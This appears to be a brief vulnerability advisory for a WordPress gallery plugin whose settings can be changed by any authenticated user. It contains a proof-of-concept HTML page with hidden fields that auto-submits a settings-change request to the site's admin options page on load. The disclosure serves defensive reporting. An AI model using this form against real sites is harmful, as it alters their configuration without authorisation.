Description The plugin does not have authorisation check when updating its settings, which could allow any authenticated users, such as subscriber to update them
<html>
<body>
<form action="http://WP/wp-admin/options-general.php" method="POST">
<input type="hidden" name="bar_size" value="anything" />
<input type="hidden" name="indexIndicatorSep" value="anything" />
<input type="hidden" name="loop_images" value="1" />
<input type="hidden" name="show_close_element" value="1" />
<input type="hidden" name="show_fullscreen_element" value="1" />
<input type="hidden" name="show_zoom_element" value="1" />
<input type="hidden" name="show_share_element" value="1" />
<input type="hidden" name="show_counter_element" value="1" />
<input type="hidden" name="show_arrow_element" value="1" />
<input type="hidden" name="show_preloader_element" value="1" />
<input type="hidden" name="tap_to_toggle_controls" value="1" />
<input type="hidden" name="photoswipe_save" value="Save Settings" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
the response of the request above is 403, but the settings update still happens